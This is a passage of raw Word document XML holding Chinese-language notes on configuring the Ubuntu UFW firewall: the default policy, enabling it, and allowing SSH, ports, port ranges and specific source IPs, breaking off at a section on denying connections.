    <w:p w14:paraId="6CFC3FAD" w14:textId="1184A2B7" w:rsidR="006A4B20" w:rsidRDefault="006A4B20" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2862F40A" w14:textId="7738E7E4" w:rsidR="00A440F4" w:rsidRDefault="00A440F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2501E0" w14:textId="34643CFB" w:rsidR="00A440F4" w:rsidRDefault="00A440F4" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A440F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UFW</w:t>
      </w:r>
      <w:r w:rsidRPr="00A440F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A440F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Uncomplicated Firewal</w:t>
      </w:r>
      <w:r w:rsidRPr="00A440F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A440F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C4BDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu </w:t>
      </w:r>
      <w:r w:rsidRPr="007C4BDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>下基于</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4BDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C4BDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4BDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C4BDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的接口</w:t>
      </w:r>
      <w:r w:rsidRPr="00A440F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，旨在简化配置防火墙的过程。默认情况下</w:t>
      </w:r>
      <w:r w:rsidRPr="00A440F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> UFW </w:t>
      </w:r>
      <w:r w:rsidRPr="00A440F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为关闭状态，开启时默认为拒绝所有传入链接，并允许所有传出连接。这意味着任何人尝试到达您的服务器将无法连接，而服务器内的任何应用程序能够达到外部世界。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11373C50" w14:textId="0F117726" w:rsidR="00A440F4" w:rsidRDefault="00A440F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C14951E" w14:textId="77777777" w:rsidR="00A440F4" w:rsidRPr="00A440F4" w:rsidRDefault="00A440F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD4C134" w14:textId="050FD196" w:rsidR="006A4B20" w:rsidRDefault="0073556B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限才能操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE82B60" w14:textId="77777777" w:rsidR="0073556B" w:rsidRDefault="0073556B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CFC57FC" w14:textId="4E781ED9" w:rsidR="006A4B20" w:rsidRDefault="0073556B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0073556B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ufw status verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0873B6EF" w14:textId="175C42BC" w:rsidR="00D00088" w:rsidRDefault="0073556B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打印拒绝连接的地址，和开放的端口、关闭的端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6616491B" w14:textId="67ED1670" w:rsidR="0073556B" w:rsidRDefault="0073556B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D82B283" w14:textId="53F598F4" w:rsidR="00A4748F" w:rsidRDefault="001E3D26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001E3D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UFW</w:t>
      </w:r>
      <w:r w:rsidRPr="001E3D26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防火墙的默认行为是阻止所有传入和转发流量，并允许所有出站流量。这意味着除非您打开指定的端口，否则任何尝试访问您的服务器的人都将无法连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA487A1" w14:textId="61F406E6" w:rsidR="00A4748F" w:rsidRDefault="00A4748F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69B99678" w14:textId="05D39CC0" w:rsidR="00A4748F" w:rsidRDefault="0021799B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00982249">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo ufw allow ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22312288" w14:textId="1685B53B" w:rsidR="0021799B" w:rsidRDefault="00D829E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00982249">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo ufw enable</w:t>
      </w:r>
      <w:r w:rsidRPr="00D829E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会启用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D829E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00D829E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防火墙，并提示你命令可能会中断</w:t>
      </w:r>
      <w:r w:rsidRPr="00D829E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00D829E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的连接是否要进行该操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D45B559" w14:textId="40250F9F" w:rsidR="0021799B" w:rsidRDefault="0021799B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68D512E3" w14:textId="4061CE81" w:rsidR="00D829E1" w:rsidRDefault="00D829E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开端口，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D829E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果未给出协议，则</w:t>
      </w:r>
      <w:r w:rsidRPr="00D829E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UFW</w:t>
      </w:r>
      <w:r w:rsidRPr="00D829E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会同时为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D829E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D829E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00D829E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D829E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160FBFC5" w14:textId="59417B53" w:rsidR="0021799B" w:rsidRPr="00982249" w:rsidRDefault="00D829E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00982249">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ufw allow port_number/protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3115C55A" w14:textId="2B40D002" w:rsidR="0021799B" w:rsidRDefault="0021799B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7078AD0C" w14:textId="65C5C4FE" w:rsidR="0021799B" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果写协议名字的话，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会检查</w:t>
      </w:r>
      <w:r w:rsidRPr="00047951">
        <w:t>/etc/services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中对应指定的服务和端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2324A1" w14:textId="77777777" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C45D426" w14:textId="77777777" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UFW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还允许您打开指定的端口范围。起始端口和结束端口用冒号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分隔，并且您必须指定协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE87606" w14:textId="77777777" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE13EE5" w14:textId="77777777" w:rsidR="00982249" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，如果要同时在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许来自</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口的连接，则可以运行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A046AD8" w14:textId="7C720971" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00982249">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo ufw allow 7100:7200/tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0683AFD2" w14:textId="77777777" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FCCC7B" w14:textId="77777777" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定端口号最常用的方式例如命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo ufw allow 80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UFW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还支持使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字指定协议。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713D3F35" w14:textId="77777777" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55AEBAC1" w14:textId="77777777" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo ufw allow 80 #tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3F6A89" w14:textId="77777777" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo ufw allow 80/tcp #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A569AF" w14:textId="3AE6DD3E" w:rsidR="0021799B" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sudo ufw allow proto tcp to any port 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B8B9C9" w14:textId="45C25456" w:rsidR="0073556B" w:rsidRDefault="0073556B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2A45A7" w14:textId="2FBEEC6A" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DFC59B1" w14:textId="77777777" w:rsidR="0063352E" w:rsidRDefault="0063352E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网卡</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65166AEE" w14:textId="0D9D855F" w:rsidR="0031630C" w:rsidRDefault="0031630C" w:rsidP="0031630C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>如果只写协议（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> http ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>），会检查</w:t>
      </w:r>
      <w:r w:rsidRPr="0031630C">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/etc/services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>对应端口来封端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFE8FC3" w14:textId="77777777" w:rsidR="0031630C" w:rsidRDefault="0031630C" w:rsidP="0031630C"/>
    <w:p w14:paraId="00C01C9D" w14:textId="77777777" w:rsidR="0031630C" w:rsidRPr="0031630C" w:rsidRDefault="0031630C" w:rsidP="0031630C"/>
    <w:p w14:paraId="4A8062B1" w14:textId="6509ADCB" w:rsidR="00047951" w:rsidRDefault="0063352E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要允许来自指定源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的连接，请使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字，后跟源地址。如果要</w:t>
      </w:r>
      <w:r w:rsidRPr="00D15C3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>仅允许指定的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D15C3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D15C3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>地址访问指定的端口，请使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D15C3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>to any port</w:t>
      </w:r>
      <w:r w:rsidRPr="00D15C3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>关键字，后跟端口号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163A9879" w14:textId="77777777" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo ufw allow from 192.168.1.100 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仅允许单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F820B0" w14:textId="77777777" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00982249">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo ufw allow from 192.168.1.100 to any port 3306</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仅允许单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3306</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0AEBC3" w14:textId="77777777" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00982249">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo ufw allow from 192.168.1.0/24 to any port 3306</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3776355A" w14:textId="000359EE" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sudo ufw allow in on eth2 to any port 3306</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AF3CB8" w14:textId="58B93370" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57DAC720" w14:textId="3B7A4BDA" w:rsidR="0031630C" w:rsidRDefault="0031630C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0031630C">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ufw allow ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE7315D" w14:textId="7BCB1300" w:rsidR="0031630C" w:rsidRDefault="0031630C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0031630C">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ufw allow 7722/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9D7BFB" w14:textId="77777777" w:rsidR="0031630C" w:rsidRDefault="0031630C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E265E74" w14:textId="77777777" w:rsidR="0031630C" w:rsidRDefault="0031630C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07CDD5DF" w14:textId="77777777" w:rsidR="0031630C" w:rsidRPr="0031630C" w:rsidRDefault="0031630C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="646D509A" w14:textId="77777777" w:rsidR="00B928DA" w:rsidRDefault="00B928DA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拒绝连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B9FF48" w14:textId="77777777" w:rsidR="00B928DA" w:rsidRDefault="00B928DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有传入连接的默认策略均设置为</w:t>
      </w:r>
